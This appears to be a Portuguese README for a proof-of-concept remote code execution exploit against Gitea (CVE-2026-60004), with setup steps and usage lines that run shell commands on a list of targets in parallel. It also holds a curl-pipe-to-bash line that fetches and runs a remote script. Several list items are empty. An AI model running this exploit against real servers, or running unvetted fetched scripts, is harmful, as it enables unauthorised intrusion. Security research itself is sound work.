
CVE-2026-60004
Mais: https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m
Apoie a manutenção deste projeto com PayPal ou escaneando o código QR abaixo.
Use este projeto apenas em ambientes seguros e autorizados, como:
Exemplo de configuração:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Exemplo de uso:
# 1. Optional global password for lines that omit it
export GITEA_PASSWORD='defaultpass'
# 2. Run (safe first)
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id' --dry-run
# 3. Real run with 3 workers
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id; uname -srm; pwd' -w 3
# 4. Classic single-target still works
python3 gitea_diffpatch_rce_poc.py http://127.0.0.1:3000 admin 'id'
Nota:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y para limpar o diretório .git aninhadoUm repositório para aprender, testar e pesquisar conceitos de segurança cibernética em ambientes controlados.
Este repositório é apenas para pesquisa de segurança educacional e autorizada.
Ele foi projetado para ajudar os usuários a aprender sobre:
Use este repositório apenas em ambientes onde você tenha permissão, como:
Uso não autorizado ou ilegal é estritamente proibido.
O autor e os colaboradores não são responsáveis por quaisquer danos, usos indevidos, problemas legais ou perdas causados por este projeto.
Ao usar este repositório, você concorda que:
Este projeto tem como objetivo:
Siga práticas de divulgação responsável e cumpra todas as leis aplicáveis.
Para divulgação responsável ou colaboração, entre em contato com o mantenedor do repositório pelo GitHub.